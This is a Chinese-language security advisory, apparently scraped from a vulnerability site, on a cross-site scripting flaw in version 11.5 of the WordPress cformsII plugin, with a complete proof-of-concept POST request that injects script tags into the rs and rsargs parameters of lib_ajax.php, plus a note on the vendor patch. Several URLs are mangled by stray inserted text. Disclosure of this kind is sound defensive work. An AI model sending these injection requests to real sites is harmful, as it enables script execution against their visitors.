影响版本: Nicole Stich cformsII 11.5
漏洞 描述:
WordPress是一款免费的 论坛 Blog系统。
WordPress所使用的cformsII插件没有正确的过滤用户提交给wp-content/plugins/cforms /lib_ajax.php页面的rs和rsargs参数便显示给了用户。攻击者可以通过提交恶意的POST请求来利用这个漏洞,当用户查看生成页面时就会导致执行所注入的代码。
<*参考 http://secunia测试数据/advisories/42006/ http://HdhCmsTestconviso测试数据.br/security-advisory-cform-wordpress-plugin-v-11-cve-2010-3977/ *>
测试方法:
Request:
/wp-content/plugins/cforms/lib_ajax.php">http://<server>/wp-content/plugins/cforms/lib_ajax.php
POST /wp-content/plugins/cforms/lib_ajax.php HTTP/1.1
Host: <server>
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:
1.9.2.10) Gecko/20100914 Firefox/3.6.10
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 219
Cookie: wp-settings-1=m0%3Do%26m1%3Do%26m2%3Do%26m3%3Do%26m4%3Do%26m5%3Do
%26m6%3Do%26m7%3Do%26m8%3Do%26urlbutton%3Dnone%26editor%3Dtinymce
%26imgsize%3Dfull%26align%3Dcenter%26hidetb%3D1%26m9%3Dc%26m10%3Do
%26uploader%3D1%26m11%3Do; wp-settings-time-1=1285758765;
c o m m e n t _ a u t h o r _ 9 3 f 4 1 b a 0 b 1 6 f 3 4 6 7 6 f 8 0 2 0 5 8 e 8 2 3 8 8 f 6 = t e s t ;
comment_author_email_93f41ba0b16f34676f802058e82388f6=rbranco_nospam
%40checkpoint测试数据
Pragma: no-cache
Cache-Control: no-cache
rs=<script>alert(1)</script>&rst=&rsrnd=1287506634854&rsargs[]=1$#
$<script>alert(1)</script>$#$rbranco_nospam@checkpoint测试数据$#$http://
alert(1) HdhCmsTestcheckpoint测试数据$#$<script>alert(1)</script >
Nicole Stich ------------ 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页 下载 :
http://HdhCmsTestdeliciousdays测试数据/cforms-plugin/
查看更多关于WordPress cformsII插件rs和rsargs参数脚本注入漏洞及修的详细内容...